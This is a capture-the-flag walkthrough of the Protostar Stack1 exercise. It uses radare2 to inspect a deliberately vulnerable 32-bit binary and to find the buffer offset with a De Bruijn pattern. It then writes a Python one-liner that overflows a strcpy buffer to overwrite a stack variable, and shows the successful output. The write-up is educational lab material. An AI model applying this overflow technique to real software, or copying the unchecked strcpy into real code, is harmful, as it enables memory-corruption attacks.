Exploiting Protostar Stack1 using radare2

2017, Dec 18    

Exploiting Protostar Stack1

Problem link

You can check previous problems here :

Problem source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}

We will work in this problem as we do not have the C source code

First we want to know more info about the binary

$ rabin2 -I stack1
arch     x86
binsz    23196
bintype  elf
bits     32
canary   false
class    ELF32
crypto   false
endian   little
havecode true
intrp    /lib/ld-linux.so.2
lang     c
linenum  true
lsyms    true
machine  Intel 80386
maxopsz  16
minopsz  1
nx       false
os       linux
pcalign  0
pic      false
relocs   true
relro    no
rpath    NONE
static   false
stripped false
subsys   linux
va       true

As you can clearly see, our binary is a 32bit ELF file, not stripped, the file isn’t protected with canaries , pic, nx or relro.

Let’s have a look on what’s happening inside the app

We will start the app inside Radare2 and have a look in Visual Mode to try understanding how it’s working

[root:~/Downloads]# r2 -d stack1
Process with PID 10307 started...
= attach 10307 10307
bin.baddr 0x08048000
Using 0x8048000
asm.bits 32
[0xb7fdba30]> aas
[0xb7fdba30]> dcu main
Continue until 0x08048464 using 1 bpsize
hit breakpoint at: 8048464
[0x08048464]> VV
    .--------------------------------.
    |  0x8048487 ;[ga]               |
    | mov dword [local_5ch], 0       |
    |    ; [0xc:4]=-1                |
    |    ; 12                        |
    | mov eax, dword [arg_ch]        |
    | add eax, 4                     |
    | mov eax, dword [eax]           |
    | mov dword [local_4h], eax      |
    |    ; 0x1c                      |
    |    ; 28                        |
    | lea eax, dword [local_1ch]     |
    | mov dword [esp], eax           |
    | call sym.imp.strcpy;[ge]       |
    |    ; [0x5c:4]=-1               |
    |    ; '\'                       |
    |    ; 92                        |
    | mov eax, dword [local_5ch]     |
    | cmp eax, 0x61626364            |
    | jne 0x80484c0;[gf]             |
    `--------------------------------'

So this is the key line cmp eax, 0x61626364, so our main Goal is to override $eax with 0x61626364

Now we’ll use a tool in radare’s framework called ragg2, which allows us to generate a cyclic pattern called De Bruijn Sequence and check the exact offset where our payload overrides the buffer.

$ ragg2 -P 100 -r > payload.txt
$ r2 -d stack1
Process with PID 3427 started...
= attach 3427 3427
bin.baddr 0x08048000
Using 0x8048000
asm.bits 32
[0xb7fdba30]> ood `! cat payload.txt`
Wait event received by different pid 3427
Process with PID 3458 started...
File dbg:///root/Downloads/stack1  AAABAACAAUAAV...AAcAAdAAeAAfAAgAAh reopened in read-write mode
= attach 3458 3458
3458
[0xb7fdba30]> dcu main
Continue until 0x08048464 using 1 bpsize
hit breakpoint at: 8048464
[0xb7fdba30]> V
  • ood ! cat payload.txt: reopen in debugger mode (with args)

In visual mode you can move step by step using S untill you reach the line before cmp eax, 0x61626364

[0x080484a7]> wopO eax
64

Now let’s rewrite our payload and exploit the binary ** Notice that we are working with a little indean so 0x61626364 will be \x64\x63\x62\x61 (Reversed)

$ python -c 'print "A" * 64 + "\x64\x63\x62\x61" + "B" * 20' > payload.txt
$ r2 -d stack1
Process with PID 6158 started...
= attach 6158 6158
bin.baddr 0x08048000
Using 0x8048000
asm.bits 32
[0xb7fdba30]> ood `! cat payload.txt`
Wait event received by different pid 6158
Process with PID 6167 started...
File dbg:///root/Downloads/stack1  AAAAAAAA...AAAAdcbaBBBBBBBBBBBBBBBBBBBB reopened in read-write mode
= attach 6167 6167
6167
[0xb7fdba30]> dc
you have correctly got the variable to the right value
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x42424242 code=1 ret=0
[0x42424242]>

And we did it ;)